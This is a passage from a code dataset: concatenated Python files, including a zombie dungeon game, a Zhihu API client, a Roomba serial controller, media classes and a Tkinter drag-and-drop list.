attack_zombies(hero, zombies):\n \"\"\"Simulates the battle in a dungeon\"\"\"\n menu_items = {'H': show_lives_remaining, 'Z': show_lives_remaining,\n 'M': show_fight_menu, 'A': attack_zombies}\n\n for num in range(0, len(zombies)):\n if (zombies[num].health == 0):\n continue\n print(\"You're fighting Zombie \", num + 1, \"....\", sep='')\n\n hero_die = random.randint(1, 6)\n zombie_die = random.randint(1, 6)\n\n if (hero_die >= zombie_die):\n print(\"You will throw the first punch, if you choose to battle.\")\n else:\n print(\"The zombie will throw the first punch\")\n if (zombies[num].throw_punch(hero)):\n print(\"The Zombie\", num + 1, \"punched you!\")\n hero.got_punched()\n else:\n print(\"The Zombie\", num + 1, \"swung and missed!\")\n\n show_fight_menu()\n choice = input(\"Enter [command]: \")\n choice_cap = choice.upper()\n while (hero.health != 0 and zombies[num].health != 0):\n while (choice_cap != 'Q'):\n func = menu_items.get(choice_cap)\n if (not func):\n print(\"Invalid Command!\")\n else:\n if (choice_cap == 'Z'):\n func(zombies[num])\n elif (choice_cap == 'H'):\n func(hero)\n elif (choice_cap == 'A'):\n if (hero.throw_punch(zombies[num])):\n print(\"You punched Zombie \", num + 1, \"!\", sep='')\n zombies[num].got_punched()\n if (zombies[num].health == 0):\n break\n else:\n print(\"You swung at the zombie and missed!\")\n\n if (zombies[num].throw_punch(hero)):\n print(\"The Zombie\", num + 1, \"punched you!\")\n hero.got_punched()\n else:\n print(\"The Zombie\", num + 1, \"swung and missed!\")\n print(\"\\n\")\n else:\n func()\n choice = input(\"Enter [command]: \")\n choice_cap = choice.upper()\n if (choice_cap == 'Q'):\n return -1\n\n if (hero.health == 0):\n print(\"Your were killed by Zombie \", num + 1, \"!\\n\", sep='')\n return 0\n else:\n print(\"You killed Zombie \", num + 1, \"!\\n\", sep='')\n return 1\n\ndef store_loot(hero, treasure):\n \"\"\"Stores any treasures found by the hero in his loot bag\"\"\"\n loot = hero.loot\n treasure_item = treasure.description\n\n ct = loot.get(treasure_item)\n if (ct):\n print(\"You found another\", treasure_item)\n loot[treasure_item] = ct + 1\n else:\n if ['a','e','i','o','u'].count(treasure_item[0]):\n print(\"You found an\", treasure_item)\n else:\n print(\"You found a\", treasure_item)\n loot[treasure_item] = 1\n\ndef exit_dungeon(room_title):\n \"\"\"Allows the user to leave a dungeon\"\"\"\n print(\"Leaving \", room_title, \"....\", sep='')\n input(\"Press Enter to continue...\")\n clear_screen()\n outside_dungeon.display_game_title()\n outside_dungeon.display_menu()\n\ndef enter_dungeon(quest_map, hero, room_no):\n \"\"\"Make a grand entrance in a dungeon\"\"\"\n rooms = quest_map.rooms\n rooms_left = quest_map.rooms_left\n room = rooms[room_no - 1]\n zombies = room.zombies\n is_treasure = 0\n\n zombie_ct = len(zombies)\n clear_screen()\n print(get_title_display(room_no))\n\n if (zombie_ct == 1):\n print(\"\\nThere is only 1 zombie to defeat\")\n else:\n print(\"\\nThere are\", zombie_ct, \"zombies to defeat\")\n\n if (len(rooms_left[room_no - 1]) == 3):\n print(\"This room has a treasure!\")\n is_treasure = 1\n\n show_menu()\n choice = input(\"Enter [command]: \")\n choice_cap = choice.upper()\n\n while (choice_cap != 'Z' and choice_cap != 'A'\n and choice_cap != 'H' and choice_cap != 'M'\n and choice_cap != 'Q' and choice_cap != 'L'):\n choice = input(\"Enter [command]: \")\n choice_cap = choice.upper()\n\n while (choice_cap != 'Q'):\n menu_items = {'H': outside_dungeon.display_health_stats,\n 'Z': show_zombie_stats, 'M': show_menu, 'A': attack_zombies,\n 'L': outside_dungeon.display_loot_bag}\n func = menu_items.get(choice_cap)\n if (not func):\n print(\"Invalid Command!\")\n else:\n if (choice_cap == 'Z'):\n func(zombies)\n elif (choice_cap == 'H' or choice_cap == 'L'):\n func(hero)\n elif (choice_cap == 'A'):\n attack_result = func(hero, zombies)\n if (attack_result == 1):\n rooms_left[room_no - 1][1] = 0\n print(\"You have cleared Room #\", room_no, \" '\",\n room.title, \"'\", sep='')\n if (is_treasure):\n store_loot(hero, rooms_left[room_no - 1][2])\n else:\n print(\"You were no match to the zombies in\", room.title)\n exit_dungeon(room.title)\n return attack_result\n else:\n func()\n\n choice = input(\"Enter [command]: \")\n choice_cap = choice.upper()\n exit_dungeon(room.title)\n\ndef get_title_display(room_no):\n \"\"\"Controls the list of room titles to display during the game\"\"\"\n titles = [\n \"\"\"\n _____ _ _\n |__ /___ ___ | |_ ___ _ __ (_) __ _\n / // _ \\ / _ \\| __/ _ \\| '_ \\| |/ _` |\n / /| (_) | (_) | || (_) | |_) | | (_| |\n /____\\___/ \\___/ \\__\\___/| .__/|_|\\__,_|\n |_|\"\"\",\n \"\"\"\n _ _ _ _\n / \\ _ __ ___ _ __ __| | ___| | | ___\n / _ \\ | '__/ _ \\ '_ \\ / _` |/ _ \\ | |/ _ \\ \n / ___ \\| | | __/ | | | (_| | __/ | | __/\n /_/ \\_\\_| \\___|_| |_|\\__,_|\\___|_|_|\\___|\"\"\",\n \"\"\"\n ____ __ __ __ _\n / ___|__ ___ _____ ___ / _| \\ \\ / /__ _ __ __| | ___ _ __ ___ \n | | / _` \\ \\ / / _ \\ / _ \\| |_ \\ \\ /\\ / / _ \\| '_ \\ / _` |/ _ \\ '__/ __|\n | |__| (_| |\\ V / __/ | (_) | _| \\ V V / (_) | | | | (_| | __/ | \\__ \\ \n \\____\\__,_| \\_/ \\___| \\___/|_| \\_/\\_/ \\___/|_| |_|\\__,_|\\___|_| |___/\"\"\",\n \"\"\"\n _ _ _ _\n | \\ | | _____ _____ _ __| | __ _ _ __ __| |\n | \\| |/ _ \\ \\ / / _ \\ '__| |/ _` | '_ \\ / _` |\n | |\\ | __/\\ V / __/ | | | (_| | | | | (_| |\n |_| \\_|\\___| \\_/ \\___|_| |_|\\__,_|_| |_|\\__,_|\"\"\",\n \"\"\"\n _____ _\n |_ _|__ ___ _ __ | |_ _____ ___ __\n | |/ _ \\ / _ \\| '_ \\| __/ _ \\ \\ /\\ / / '_ \\ \n | | (_) | (_) | | | | || (_) \\ V V /| | | |\n |_|\\___/ \\___/|_| |_|\\__\\___/ \\_/\\_/ |_| |_|\"\"\",\n \"\"\"\n ____ _ _ _ _ _ _\n | _ \\(_)_ _(_) ___ | | | | ___ | | | _____ __\n | |_) | \\ \\/ / |/ _ \\ | |_| |/ _ \\| | |/ _ \\ \\ /\\ / /\n | __/| |> <| | __/ | _ | (_) | | | (_) \\ V V /\n |_| |_/_/\\_\\_|\\___| |_| |_|\\___/|_|_|\\___/ \\_/\\_/\"\"\",\n \"\"\"\n _____ _ ____ _ _ ___ _\n |_ _| |__ ___ / ___| ___ _ _| |_| |__ ___ _ __ _ __ |_ _|___| | ___ ___\n | | | '_ \\ / _ \\ \\___ \\ / _ \\| | | | __| '_ \\ / _ \\ '__| '_ \\ | |/ __| |/ _ \\/ __|\n | | | | | | __/ ___) | (_) | |_| | |_| | | | __/ | | | | | | |\\__ \\ | __/\\__ \\ \n |_| |_| |_|\\___| |____/ \\___/ \\__,_|\\__|_| |_|\\___|_| |_| |_| |___|___/_|\\___||___/\"\"\",\n \"\"\"\n __ __ _ _ _\n \\ \\ / /__ _ __ __| | ___ _ __| | __ _ _ __ __| |\n \\ \\ /\\ / / _ \\| '_ \\ / _` |/ _ \\ '__| |/ _` | '_ \\ / _` |\n \\ V V / (_) | | | | (_| | __/ | | | (_| | | | | (_| |\n \\_/\\_/ \\___/|_| |_|\\__,_|\\___|_| |_|\\__,_|_| |_|\\__,_|\"\"\",\n \"\"\"\n ____ _ _ _____ _ _\n | _ \\ __ _ _ __ __ _ __| (_)___ ___ | ___|_ _| | |___\n | |_) / _` | '__/ _` |/ _` | / __|/ _ \\ | |_ / _` | | / __|\n | __/ (_| | | | (_| | (_| | \\__ \\ __/ | _| (_| | | \\__ \\ \n |_| \\__,_|_| \\__,_|\\__,_|_|___/\\___| |_| \\__,_|_|_|___/\"\"\",\n \"\"\"\n _____ _ _ _ _____ _\n | ____|_ __ ___| |__ __ _ _ __ | |_ ___ __| | | ___|__ _ __ ___ ___| |_\n | _| | '_ \\ / __| '_ \\ / _` | '_ \\| __/ _ \\/ _` | | |_ / _ \\| '__/ _ \\/ __| __|\n | |___| | | | (__| | | | (_| | | | | || __/ (_| | | _| (_) | | | __/\\__ \\ |_\n |_____|_| |_|\\___|_| |_|\\__,_|_| |_|\\__\\___|\\__,_| |_| \\___/|_| \\___||___/\\__|\"\"\"]\n\n return titles[room_no - 1]\n\ndef clear_screen():\n \"\"\"Clears the screen\"\"\"\n osname = os.name\n if osname == 'posix':\n os.system('clear')\n elif osname == 'nt' or osname == 'dos':\n os.system('cls')\n else:\n print(\"\\n\" * 30)\n","sub_path":"inside_dungeon.py","file_name":"inside_dungeon.py","file_ext":"py","file_size_in_byte":11825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"267691388","text":"'''\r\nDestroying Objects (Garbage Collection):\r\nPython deletes unneeded objects (built-in types or class instances)\r\nautomatically to free the memory space. The process by which Python\r\nperiodically reclaims blocks of memory that no longer are in use is\r\ntermed as Garbage Collection. Python's garbage collector runs during\r\nprogram execution and is triggered when an object's reference count\r\nreaches zero. An object's reference count changes as the number of\r\naliases that point to it changes. An object's reference count\r\nincreases when it is assigned a new name or placed in a container\r\n(list, tuple, or dictionary). The object's reference count decreases\r\nwhen it is deleted with del, its reference is reassigned, or its\r\nreference goes out of scope. When an object's reference count\r\nreaches zero, Python collects it automatically.\r\n'''\r\n\r\na = 40 # Create object <40>\r\nb = a # Increase ref. count of <40>\r\nc = [b] # Increase ref. count of <40>\r\n\r\ndel a # Decrease ref. count of <40>\r\nb = 100 # Decrease ref. count of <40>\r\nc[0] = -1 # Decrease ref. count of <40>\r\n\r\n'''\r\nYou normally will not notice when the garbage collector destroys an orphaned\r\ninstance and reclaims its space. However, a class can implement the special\r\nmethod __del__(), called a destructor, that is invoked when the instance is\r\nabout to be destroyed. This method might be used to clean up any non-memory\r\nresources used by an instance.\r\n'''\r\n","sub_path":"Area52/OO/Garbage_colletion.py","file_name":"Garbage_colletion.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"645388169","text":"#!/usr/bin/env python3\n\"\"\"\nph3fn=\"pyhook-1.6.1-cp35-cp35m-win32.whl\"\nph3downdir=\"\\\\$ph3fn\"\nph3downlink=\"https://files.pythonhosted.org/packages/00/36/c08af743a671d94da7fe10ac2d078624f3efc09273ffae7b18601a8414fe/PyHook3-1.6.1-cp35-win32.whl\"\ncurl -o \"$ph3fn\" \"$ph3downlink\"\n\"\"\"\nimport os, sys, threading\nimport _thread\nfrom FN33andlib import *\nfrom functools import partial\n\ndir0 = os.path.dirname(os.path.realpath(__file__))\ntextclick=0\npause=0\nis_recording=0\nlinuxpc=1\ndef Default():\n textclick=0\n pause=0\n is_recording=0\nDefault()\ndef checkdep():\n deplist=[\"pyautogui pyuserinput\"]\n deplist.split()\n if sys.platform in ['linux', 'linux2']:\n callpip=\"pip3\"\n if sys.platform in ['Windows', 'win32', 'cygwin']:\n callpip=\"pip\"\n for f in deplist:\n subprocess.call(callpip+\" install \"+str(f),shell=True)\n#checkdep()\ndef MouseGetPos():\n if sys.platform in ['linux', 'linux2']:\n screenroot=display.Display().screen().root\n pointer = screenroot.query_pointer()\n data = pointer._data\n x=data[\"root_x\"]\n y=data[\"root_y\"]\n return x, y\n if sys.platform in ['Windows', 'win32', 'cygwin']:\n pass\n\nimport win32api, win32con\nimport win32com.client as comclt\nwsh=comclt.Dispatch(\"WScript.Shell\")\n\"\"\"\nwsh.AppActivate(\"Notepad\") # select another application\nwsh.AppActivate(\"%USERPROFILE%\\\\Documents\\\\Docs\\\\Automate\\\\FiiNoteWINE\\\\FiiNote.exe\")\nfocusprog(\"FiiNote\")\n\"\"\"\n","sub_path":"fextr/1testfextr.py","file_name":"1testfextr.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"290964276","text":"#!/usr/bin/env python\nimport argparse\n\nfrom procgen.interactive import ProcgenInteractive\nfrom procgen import ProcgenEnv\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass HeistppStatePlotter():\n\n def __init__(self, world_dim, plot_interval):\n self.world_dim = world_dim\n self.plot_interval = plot_interval\n\n self.fig, self.axs = plt.subplots(2,1);\n plt.ion()\n plt.show()\n self.reward = []\n self.episode_return = []\n\n self.map = None\n\n\n def __call__(self, obs, rew, done, info, episode_steps, episode_return):\n\n # The state of each cell is encoded as following:\n # {100:'emmpty',51:'wall',21:'fire',20:'water',9:'exit',2:'key',1:'door'}\n if self.map is None:\n self.map = {}\n for i, v in enumerate(sorted(np.unique(info['state'][7:]))):\n self.map[v] = i\n\n if not episode_steps % self.plot_interval:\n\n world = np.array([self.map[v] for v in info['state'][7:]])\n world = world.reshape(self.world_dim,self.world_dim)\n self.axs[0].clear()\n self.axs[0].imshow(world)\n agent_x, agent_y = (info['state'][0] % self.world_dim), (info['state'][0] // self.world_dim);\n self.axs[0].plot(agent_x,agent_y,'ko')\n self.axs[0].invert_yaxis()\n\n\n self.axs[1].clear()\n self.reward.append(rew)\n self.episode_return.append(episode_return)\n self.axs[1].plot(self.reward)\n self.axs[1].plot(self.episode_return)\n\n plt.draw()\n self.fig.canvas.draw_idle()\n self.fig.canvas.start_event_loop(0.1)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--vision\", choices=[\"agent\", \"human\"], default=\"human\")\n parser.add_argument(\"--record-dir\", help=\"directory to record movies to\")\n parser.add_argument(\"--distribution-mode\", default=\"hard\", help=\"which distribution mode to use for the level generation\")\n parser.add_argument(\"--level-seed\", type=int, help=\"select an individual level to use\")\n parser.add_argument(\"--use-generated-assets\", help=\"using autogenerated assets\", choices=[\"yes\",\"no\"], default=\"no\")\n args = parser.parse_args()\n\n kwargs = {\"distribution_mode\": args.distribution_mode}\n kwargs[\"use_generated_assets\"] = True if (args.use_generated_assets == \"yes\") else False\n\n if args.level_seed is not None:\n kwargs[\"start_level\"] = args.level_seed\n kwargs[\"num_levels\"] = 1\n\n world_dim = int(10)\n kwargs[\"additional_info_spaces\"] = [ProcgenEnv.C_Space(\"state\", False, (7+world_dim*world_dim,), bytes, (0,255))]\n\n kwargs[\"options\"] = {\n 'world_dim':world_dim,\n 'wall_chance':0.5,\n 'fire_chance':0.3,\n 'water_chance':0.2,\n 'num_keys':int(2),\n 'num_doors':int(1),\n 'with_grid_steps':True,\n 'completion_bonus':10.0,\n 'fire_bonus':-5.0,\n 'water_bonus':-2.0,\n 'action_bonus':-1.0,\n }\n\n ia = ProcgenInteractive(args.vision, True, env_name=\"heistpp\", **kwargs)\n\n ia.skip_info_out(\"state\")\n\n step_cb = HeistppStatePlotter(world_dim, 1)\n\n ia.add_step_callback(step_cb)\n\n\n ia.run(record_dir=args.record_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"procgen/examples/play_heistpp.py","file_name":"play_heistpp.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46476350","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\zhihu\\models\\zhihux.py\n# Compiled at: 2017-07-25 02:41:35\n# Size of source mod 2**32: 6144 bytes\n\"\"\"\n通用的操作放在此模块中\n\"\"\"\nimport logging\nfrom . import Zhihu\nfrom ..auth import need_login\nfrom ..error import ZhihuError\nfrom ..url import URL\n\nclass ZhihuX(Zhihu):\n\n @need_login\n def send_message(self, content, user_id=None, profile_url=None, user_slug=None, **kwargs):\n \"\"\"\n 给指定的用户发私信\n :param content 私信内容\n :param user_id 用户id\n :param profile_url: 用户主页地址\n :param user_slug : 用户的个性域名\n\n >>> send_message(profile_url = \"https://www.zhihu.com/people/xiaoxiaodouzi\")\n >>> send_message(user_slug = \"xiaoxiaodouzi\")\n >>> send_message(user_id = \"1da75b85900e00adb072e91c56fd9149\")\n \"\"\"\n if not any([user_id, profile_url, user_slug]):\n raise ZhihuError('至少指定一个关键字参数')\n else:\n if user_id is None:\n user_slug = self._user_slug(profile_url) if user_slug is None else user_slug\n user_id = self._user_id(user_slug)\n data = {'type':'common', 'content':content, 'receiver_hash':user_id}\n response = (self._session.post)(URL.message(), json=data, **kwargs)\n if response.ok:\n return response.json()\n self.log('发送失败')\n raise ZhihuError('操作失败:%s' % response.text)\n\n @need_login\n def user(self, user_slug=None, profile_url=None, **kwargs):\n \"\"\"\n 获取用户信息\n :param user_slug : 用户的个性域名\n :param profile_url: 用户主页地址\n\n :return:dict\n\n >>> user(profile_url = \"https://www.zhihu.com/people/xiaoxiaodouzi\")\n >>> user(user_slug = \"xiaoxiaodouzi\")\n\n \"\"\"\n if not any([profile_url, user_slug]):\n raise ZhihuError('至少指定一个关键字参数')\n user_slug = self._user_slug(profile_url) if user_slug is None else user_slug\n response = (self._session.get)((URL.profile(user_slug)), **kwargs)\n if response.ok:\n return response.json()\n raise ZhihuError('操作失败:%s' % response.text)\n\n @need_login\n def follow(self, user_slug=None, profile_url=None, **kwargs):\n \"\"\"\n 关注用户\n :param user_slug:\n :param profile_url:\n :return: {\"follower_count\": int}\n\n >>> follow(profile_url = \"https://www.zhihu.com/people/xiaoxiaodouzi\")\n >>> follow(user_slug = \"xiaoxiaodouzi\")\n \"\"\"\n if not any([profile_url, user_slug]):\n raise ZhihuError('至少指定一个关键字参数')\n user_slug = self._user_slug(profile_url) if user_slug is None else user_slug\n response = (self._session.post)((URL.follow_people(user_slug)), **kwargs)\n if response.ok:\n data = response.json()\n data['followed'] = True\n return data\n raise ZhihuError('操作失败:%s' % response.text)\n\n @need_login\n def unfollow(self, user_slug=None, profile_url=None, **kwargs):\n \"\"\"\n 取消关注用户\n :param user_slug:\n :param profile_url:\n :return: {\"follower_count\": int}\n\n >>> unfollow(profile_url = \"https://www.zhihu.com/people/xiaoxiaodouzi\")\n >>> unfollow(user_slug = \"xiaoxiaodouzi\")\n \"\"\"\n if not any([profile_url, user_slug]):\n raise ZhihuError('至少指定一个关键字参数')\n user_slug = self._user_slug(profile_url) if user_slug is None else user_slug\n response = (self._session.delete)((URL.follow_people(user_slug)), **kwargs)\n if response.ok:\n data = response.json()\n data['followed'] = False\n return data\n raise ZhihuError('操作失败:%s' % response.text)\n\n @need_login\n def followers(self, user_slug=None, profile_url=None, limit=20, offset=0, **kwargs):\n \"\"\"\n 获取某个用户的粉丝列表\n :param user_slug:\n :param profile_url:\n :param limit: 最大返回数量\n :param offset:游标\n :param kwargs:\n :return:\n {\n \"paging\": {\n \"is_end\": true,\n \"totals\": 1381207,\n \"is_start\": false,\n },\n \"data\": [{\n \"avatar_url_template\": \"https://pic1.zhimg.com/fdbce7544_{size}.jpg\",\n \"badge\": [],\n \"name\": \"OPEN\",\n \"is_advertiser\": false,\n \"url\": \"http://www.zhihu.com/api/v4/people/0fcb310a722c5bb99d864ace7bb2d89c\",\n \"url_token\": \"open\",\n \"user_type\": \"people\",\n \"answer_count\": 50,\n \"headline\": \"上知乎,恍然大悟!\",\n \"avatar_url\": \"https://pic1.zhimg.com/fdbce7544_is.jpg\",\n \"is_org\": false,\n \"gender\": 1,\n \"follower_count\": 78,\n \"type\": \"people\",\n \"id\": \"0fcb310a722c5bb99d864ace7bb2d89c\"\n },\n ]\n }\n \"\"\"\n if not any([profile_url, user_slug]):\n raise ZhihuError('至少指定一个关键字参数')\n user_slug = self._user_slug(profile_url) if user_slug is None else user_slug\n r = (self._session.get)(URL.followers(user_slug), params={'limit':limit, \n 'offset':offset}, **kwargs)\n self.log(r.url)\n if r.ok:\n return r.json()\n self.log(('status code %s, body: %s' % (r.status_code, r.text)), level=(logging.ERROR))\n raise ZhihuError('操作失败:%s' % r.text)","sub_path":"pycfiles/zhihu-0.2.6-py3.6/zhihux.cpython-36.py","file_name":"zhihux.cpython-36.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"271296599","text":"import serial\r\nimport time\r\n\r\n\"\"\"\r\nCOMMAND LIST:\r\n-------------------------\r\n0 HALT: stops movement,\r\n no arguemnts required\r\n1 FORWARD: moves forward at a constant default speed (200m/s),\r\n no arguments required\r\n2 VARIFOR: moves forward at a variable speed,\r\n 1 arguments: desired speed (1-500mm/s)\r\n3 BACKWARD: moves backward at a constant default speed (200mm/s),\r\n no arguments required\r\n4 VARIBACK: moves backward at a variable speed,\r\n 1 arguments: desired speed (-1 - (-500)mm/s)\r\n5 LEFTTURN: pivots to the left at a constant speed (200mm/s),\r\n no arguments required\r\n6 RIGHTTURN: pivots to the right at a constant speed (200mm/s),\r\n no arguments required\r\n7 VEERLEFT: drives forward at a constant rate (200mm/s)\r\n and constant arc(500mm) to the left\r\n no arguments required\r\n8 VARIVEERL: drives forward at a variable rate and arc to the left\r\n 2 arguments: speed (1-500mm/s) and arc (0-2000mm)\r\n9 VEERRIGHT: drives forward at a constant rate (200mm/s)\r\n and constant arc(500mm) to the right\r\n no arguments required\r\n10 VARIVEERR: drives forward at a variable rate and arc to the right\r\n 2 arguments required: speed (1-500mm/s) and arc (-1 - (-2000)mm)\r\n11 DIRECTM: Drives each motor at an independant speed\r\n 2 arguments: speed of left wheel and right wheel (-500 - 500mm/s)\r\n12 POLLDATA: Polls IR sensor data from the Roomba, returns a list of\r\n sensor data in order from left side to right\r\n13 SERVO: Moves the Kinect's Servo into the desired angle. Straight ahead is ~90 degrees\r\n 1 argument: angle desired\r\n Give it a sec to get to its place\r\n\r\n\"\"\"\r\nclass LBAR:\r\n global SINGLE_COMMANDS\r\n global MULTI_PART_COMMANDS\r\n global POLLDATA\r\n global SERVO\r\n global LPACKET\r\n global LFPACKET\r\n global LCPACKET\r\n global RCPACKET\r\n global RFPACKET\r\n global RPACKET\r\n \r\n SINGLE_COMMANDS = (0, 1, 3, 5, 6, 7, 9)\r\n MULTI_PART_COMMANDS = (2, 4, 8, 10, 11)\r\n POLLDATA = 12\r\n SERVO = 13\r\n LPACKET = 0\r\n LFPACKET = 0\r\n LCPACKET = 0\r\n RCPACKET = 0\r\n RFPACKET = 0\r\n RPACKET = 0\r\n \r\n def __init__(self, portname=\"/dev/rfcomm0\", baud=9600):\r\n self.portname = portname\r\n self.baud = baud\r\n\r\n global ser\r\n ser = serial.Serial(self.portname, baudrate=self.baud)\r\n \r\n \r\n \r\n #Takes in the arguments for speeds and arcs and such and\r\n #converts each into a series of two bytes, then sends back\r\n #a list containing the high byte and low byte of each in\r\n #order\r\n def _getbytes(self, *args):\r\n arglist = []\r\n args = args[0]\r\n \r\n for i in range(len(args)):\r\n hexval = hex(args[i])[2:]\r\n \r\n if len(hexval) == 4:\r\n hexvalhigh = int(hexval[:2], 16)\r\n hexvallow = int(hexval[2:], 16)\r\n \r\n elif len(hexval) == 3:\r\n hexvalhigh = int ('0' + hexval[:1], 16)\r\n hexvallow = int(hexval[1:], 16)\r\n else:\r\n hexvalhigh = 0\r\n hexvallow = int(hexval, 16)\r\n \r\n arglist.append(hexvalhigh)\r\n arglist.append(hexvallow)\r\n print(\"HEXVALHIGH \", hexvalhigh)\r\n print(\"HEXVALLOW \", hexvallow) \r\n \r\n return arglist\r\n \r\n\r\n #For commands in SINGLE_COMMANDS, there should\r\n #only be one argument, the actual command, which is then\r\n #sent off on its own. For MULTI_PART_COMMANDS, the arguments\r\n #should be the command follows by either one or two arguments.\r\n #single arguments should be requested speed, multi arguments\r\n #should either be the speed and arc, or speed of each wheel\r\n #for command 11\r\n def send(self, *args):\r\n \r\n command = args[0]\r\n \r\n \r\n if command in SINGLE_COMMANDS:\r\n ser.write(bytearray((command, 0, 0, 0, 0)))\r\n return 0\r\n \r\n elif command == SERVO:\r\n angle = args[1]\r\n if angle >= 0 and angle <= 180:\r\n ser.write(bytearray((command, angle, 0, 0, 0)))\r\n return 0\r\n \r\n elif command in MULTI_PART_COMMANDS:\r\n arglist = self._getbytes(args[1:])\r\n if command == 13:\r\n arglist = arglist[::-1]\r\n ser.write(bytearray(tuple([command] + arglist)))\r\n return 0\r\n \r\n elif command == POLLDATA:\r\n ser.write(bytearray((command, 0, 0, 0, 0)))\r\n time.sleep(.1)\r\n \r\n #This reads in the information from the roomba\r\n #each sensor value will come as a string 4 char's\r\n #long (hence reading in 4 bytes each), and the int()\r\n #will then convert the string into an integer\r\n LPACKET = int(ser.read(4))\r\n LFPACKET = int(ser.read(4))\r\n LCPACKET = int(ser.read(4))\r\n RCPACKET = int(ser.read(4))\r\n RFPACKET = int(ser.read(4))\r\n RPACKET = int(ser.read(4))\r\n \r\n \r\n return (LPACKET, LFPACKET, LCPACKET,\r\n RCPACKET, RFPACKET, RPACKET)\r\n \r\n \r\n \r\n","sub_path":"LBAR_Class.py","file_name":"LBAR_Class.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"345540380","text":"class Media(object):\n '''\n All the different media types must be subclasses of this general information\n class.\n '''\n \n def __init__(self, title, synopsis, poster_image, trailer, director, year):\n self.title = title\n self.synopsis = synopsis\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer\n self.director = director\n self.release_year = year\n self.cast_members = []\n\n def show_trailer(self):\n webbrowser.open(self.trailer_url)\n \n # Cast is added outside of the constructor due to movies and TV Shows having\n # different cast sizes.\n def add_cast_member(self, cast_member):\n self.cast_members.append(cast_member)\n \n def remove_cast_member(self, cast_member):\n if cast_member in self.cast_members:\n self.cast_members.remove(cast_member)\n\nclass Movie(Media):\n '''Class for Movie creation'''\n \n VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\", \"NC-17\"]\n \n def __init__(self, title, synopsis, poster_image, trailer, director, year,\n movie_rating):\n super(Movie, self).__init__(title, synopsis, poster_image, trailer,\n director, year)\n # Only include rating of movie if it is a valid one\n if movie_rating not in self.VALID_RATINGS:\n self.rating = ''\n else:\n self.rating = movie_rating\n\nclass Tv_Show(Media):\n '''Class for TV Show creation'''\n \n VALID_RATINGS = [\"TV-Y\", \"TV-Y7\", \"TV-G\", \"TV-PG\", \"TV-14\", \"TV-MA\"]\n \n def __init__(self, title, synopsis, poster_image, trailer, director, year,\n tv_rating, season, episodes, tv_station):\n super(Tv_Show, self).__init__(title, synopsis, poster_image, trailer,\n director, year)\n # Only include rating of TV show if it is a valid one\n if tv_rating not in self.VALID_RATINGS:\n self.rating = ''\n else:\n self.rating = tv_rating\n self.season = season\n self.episodes = episodes\n self.tv_station = tv_station\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"226630871","text":"# version: 0.3\n# Author: Miguel Martinez Lopez\n\ntry:\n from ttk import Frame\nexcept ImportError:\n from tkinter.ttk import Frame\n\n# Python 3 support\ntry:\n basestring\nexcept NameError:\n basestring = str\n\nclass Item(Frame):\n def __init__(self, master, value, width, height, selection_handler=None, drag_handler = None, drop_handler=None, **kwargs):\n\n kwargs.setdefault(\"class_\", \"Item\")\n Frame.__init__(self, master, **kwargs)\n \n self._x = None\n self._y = None\n \n self._width = width\n self._height = height\n\n self._tag = \"item%s\"%id(self)\n self._value = value\n\n self._selection_handler = selection_handler\n self._drag_handler = drag_handler\n self._drop_handler = drop_handler\n\n @property\n def x(self):\n return self._x\n \n @property\n def y(self):\n return self._y\n \n @property\n def width(self):\n return self._width\n\n @property\n def height(self):\n return self._height\n \n @property\n def value(self):\n return self._value\n \n def init(self, container, x, y):\n self._x = x\n self._y = y\n\n self.place(in_=container, x=x, y=y, width=self._width, height=self._height)\n\n self.bind_class(self._tag, \"\", self._on_selection)\n self.bind_class(self._tag, \"\", self._on_drag)\n self.bind_class(self._tag, \"\", self._on_drop)\n\n self._add_bindtag(self)\n \n # Python3 compatibility: dict.values() return a view\n list_of_widgets = list(self.children.values())\n while len(list_of_widgets) != 0:\n widget = list_of_widgets.pop()\n list_of_widgets.extend(widget.children.values())\n \n self._add_bindtag(widget)\n \n def _add_bindtag(self, widget):\n bindtags = widget.bindtags()\n if self._tag not in bindtags:\n widget.bindtags((self._tag,) + bindtags)\n\n def _on_selection(self, event):\n self.tkraise()\n\n self._move_lastx = event.x_root\n self._move_lasty = event.y_root\n \n if self._selection_handler:\n self._selection_handler(self)\n\n def _on_drag(self, event):\n self.master.update_idletasks()\n \n cursor_x = self._x + event.x\n cursor_y = self._y + event.y\n\n self._x += event.x_root - self._move_lastx\n self._y += event.y_root - self._move_lasty\n\n self._move_lastx = event.x_root\n self._move_lasty = event.y_root\n\n self.place_configure(x=self._x, y=self._y)\n\n if self._drag_handler:\n self._drag_handler(cursor_x, cursor_y)\n \n def _on_drop(self, event):\n if self._drop_handler:\n self._drop_handler()\n \n def set_position(self, x,y):\n self._x = x\n self._y = y\n self.place_configure(x =x, y =y)\n \n def move(self, dx, dy):\n self._x += dx\n self._y += dy\n\n self.place_configure(x =self._x, y =self._y)\n\nclass DDList(Frame):\n def __init__(self, master, item_width, item_height, item_relief=None, item_borderwidth=None, item_padding=None, item_style=None, offset_x=0, offset_y=0, gap=0, **kwargs):\n kwargs[\"width\"] = item_width+offset_x*2\n kwargs[\"height\"] = offset_y*2\n\n Frame.__init__(self, master, **kwargs)\n\n self._item_borderwidth = item_borderwidth\n self._item_relief 